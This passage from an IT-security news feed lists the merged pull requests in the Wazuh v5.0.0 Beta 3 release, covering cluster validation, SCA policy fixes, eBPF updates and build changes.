<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/trufflesecurity/trufflehog/compare/v3.95.7...v3.95.8"><tt>v3.95.7...v3.95.8</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 3]]></title>
<description><![CDATA[What's Changed

Improve cluster file synchronization error handling by @TomasTurina in #36129
Update trojan signatures to avoid false positives on modern distros by @Miguevrgo in #35927
Improve cluster merged file parameter validation by @vikman90 in #36204
Create a backup of local_rules.xml duri...]]></description>
<link>https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</guid>
<pubDate>Thu, 02 Jul 2026 17:49:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Improve cluster file synchronization error handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454599181" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard" href="https://github.com/wazuh/wazuh/pull/36129">#36129</a></li>
<li>Update trojan signatures to avoid false positives on modern distros by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390541461" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard" href="https://github.com/wazuh/wazuh/pull/35927">#35927</a></li>
<li>Improve cluster merged file parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476621950" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard" href="https://github.com/wazuh/wazuh/pull/36204">#36204</a></li>
<li>Create a backup of local_rules.xml during execution of IT analysisd tier 0 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475277385" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36201" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36201/hovercard" href="https://github.com/wazuh/wazuh/pull/36201">#36201</a></li>
<li>Improve tmp_file path validation in cluster DAPI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486930454" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard" href="https://github.com/wazuh/wazuh/pull/36246">#36246</a></li>
<li>Revert bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495350373" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36303" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36303/hovercard" href="https://github.com/wazuh/wazuh/pull/36303">#36303</a></li>
<li>Bump 4.14.7 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496470145" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36312" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36312/hovercard" href="https://github.com/wazuh/wazuh/pull/36312">#36312</a></li>
<li>Serialize procps access to prevent modulesd crash by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489581046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36261" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36261/hovercard" href="https://github.com/wazuh/wazuh/pull/36261">#36261</a></li>
<li>Remove obsolete configuration blocks from API upload_configuration setting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487498848" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36252" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36252/hovercard" href="https://github.com/wazuh/wazuh/pull/36252">#36252</a></li>
<li>Restore working vulnerability scanner database workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502088595" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36332/hovercard" href="https://github.com/wazuh/wazuh/pull/36332">#36332</a></li>
<li>Propagate agent merged_sum after hot reload in cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468736412" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36164" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36164/hovercard" href="https://github.com/wazuh/wazuh/pull/36164">#36164</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501542567" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36331/hovercard" href="https://github.com/wazuh/wazuh/pull/36331">#36331</a></li>
<li>Authd tier 0-1 flaky tests fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504446587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36342/hovercard" href="https://github.com/wazuh/wazuh/pull/36342">#36342</a></li>
<li>Review agent info logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485038079" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36234" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36234/hovercard" href="https://github.com/wazuh/wazuh/pull/36234">#36234</a></li>
<li>Fix the wazuh-manager-modules crash that occurs while downloading the feed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503648565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36337" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36337/hovercard" href="https://github.com/wazuh/wazuh/pull/36337">#36337</a></li>
<li>Migrate FIM DB path queries to parameterized statements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517817292" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard" href="https://github.com/wazuh/wazuh/pull/36399">#36399</a></li>
<li>Fix AlmaLinux 9/10 bootloader permissions SCA check regex and optional file handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515333133" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36396" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36396/hovercard" href="https://github.com/wazuh/wazuh/pull/36396">#36396</a></li>
<li>Cluster file processing parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494129534" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard" href="https://github.com/wazuh/wazuh/pull/36296">#36296</a></li>
<li>Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523024537" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36407" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36407/hovercard" href="https://github.com/wazuh/wazuh/pull/36407">#36407</a></li>
<li>Treat the absence of the hash document as expected, not an error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505113598" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36355" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36355/hovercard" href="https://github.com/wazuh/wazuh/pull/36355">#36355</a></li>
<li>geo_point validation support all compatible formats by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423592068" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36034" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36034/hovercard" href="https://github.com/wazuh/wazuh/pull/36034">#36034</a></li>
<li>Prevent Syscollector and SCA use-after-free on modulesd shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505494861" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36359" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36359/hovercard" href="https://github.com/wazuh/wazuh/pull/36359">#36359</a></li>
<li>Add cluster security model and configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522930141" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36405" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36405/hovercard" href="https://github.com/wazuh/wazuh/pull/36405">#36405</a></li>
<li>Bump CB_SCAN_STARTED timeout and trigger ITs on wm_syscollector.c by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527847069" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36446" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36446/hovercard" href="https://github.com/wazuh/wazuh/pull/36446">#36446</a></li>
<li>Fixed an issue in eBPF with LSM hooks and improved the health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359560869" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard" href="https://github.com/wazuh/wazuh/pull/35838">#35838</a></li>
<li>Validate cluster node name format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531591190" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard" href="https://github.com/wazuh/wazuh/pull/36460">#36460</a></li>
<li>eBPF libraries updated by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533955405" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard" href="https://github.com/wazuh/wazuh/pull/36467">#36467</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539082172" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36517" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36517/hovercard" href="https://github.com/wazuh/wazuh/pull/36517">#36517</a></li>
<li>Revert "Bump 4.14.6 branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539251322" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36519" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36519/hovercard" href="https://github.com/wazuh/wazuh/pull/36519">#36519</a></li>
<li>Update changelog for 4.14.6 RC 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539470693" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36562" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36562/hovercard" href="https://github.com/wazuh/wazuh/pull/36562">#36562</a></li>
<li>Fix policy evaluation errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528195977" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36449" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36449/hovercard" href="https://github.com/wazuh/wazuh/pull/36449">#36449</a></li>
<li>Release startup hash gate when the reload chain fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495215383" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36302" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36302/hovercard" href="https://github.com/wazuh/wazuh/pull/36302">#36302</a></li>
<li>Revert "Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541090106" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36591" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36591/hovercard" href="https://github.com/wazuh/wazuh/pull/36591">#36591</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546876084" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36624" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36624/hovercard" href="https://github.com/wazuh/wazuh/pull/36624">#36624</a></li>
<li>Restore event counter and classify received messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531260982" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36456" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36456/hovercard" href="https://github.com/wazuh/wazuh/pull/36456">#36456</a></li>
<li>Unify manager integration tests workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485169588" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36235" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36235/hovercard" href="https://github.com/wazuh/wazuh/pull/36235">#36235</a></li>
<li>Remove unused Node.js 12 from arm64 deb agent builder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467836275" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36156" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36156/hovercard" href="https://github.com/wazuh/wazuh/pull/36156">#36156</a></li>
<li>Remove unused Node.js 12 from arm deb agent builders (4.14.7) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467837119" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36157" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36157/hovercard" href="https://github.com/wazuh/wazuh/pull/36157">#36157</a></li>
<li>SCA typo bug in SELinux SCA rule for CentOS 8/9/10 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514754415" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36361/hovercard" href="https://github.com/wazuh/wazuh/pull/36361">#36361</a></li>
<li>Fix <code>detect-changes</code> glob to honour <code>**</code> recursively and extract logic into a reusable action by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544605284" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36617" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36617/hovercard" href="https://github.com/wazuh/wazuh/pull/36617">#36617</a></li>
<li>Merge merge-4.14.6-into-4.14.7 into 4.14.7 [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546868343" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36623" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36623/hovercard" href="https://github.com/wazuh/wazuh/pull/36623">#36623</a></li>
<li>Reduce log noise when engine has no synchronized ruleset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505198128" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36356" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36356/hovercard" href="https://github.com/wazuh/wazuh/pull/36356">#36356</a></li>
<li>Update test modules paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549542116" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36668" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36668/hovercard" href="https://github.com/wazuh/wazuh/pull/36668">#36668</a></li>
<li>Only download external deps when required by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486894083" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36244" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36244/hovercard" href="https://github.com/wazuh/wazuh/pull/36244">#36244</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548874786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36664" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36664/hovercard" href="https://github.com/wazuh/wazuh/pull/36664">#36664</a></li>
<li>Mail forwarding and reporting 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li>Added Ubuntu 26.04's SCA policy in the SPECS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562694437" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36712" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36712/hovercard" href="https://github.com/wazuh/wazuh/pull/36712">#36712</a></li>
<li>Preliminary support new OSs - Ubuntu 26.04 - Add SCA content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AwwalQuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AwwalQuan">@AwwalQuan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561732273" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36708" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36708/hovercard" href="https://github.com/wazuh/wazuh/pull/36708">#36708</a></li>
<li>Safeguards to inventory sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534767894" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36469" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36469/hovercard" href="https://github.com/wazuh/wazuh/pull/36469">#36469</a></li>
<li>Improve the method of detecting duplicates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504512576" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36344" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36344/hovercard" href="https://github.com/wazuh/wazuh/pull/36344">#36344</a></li>
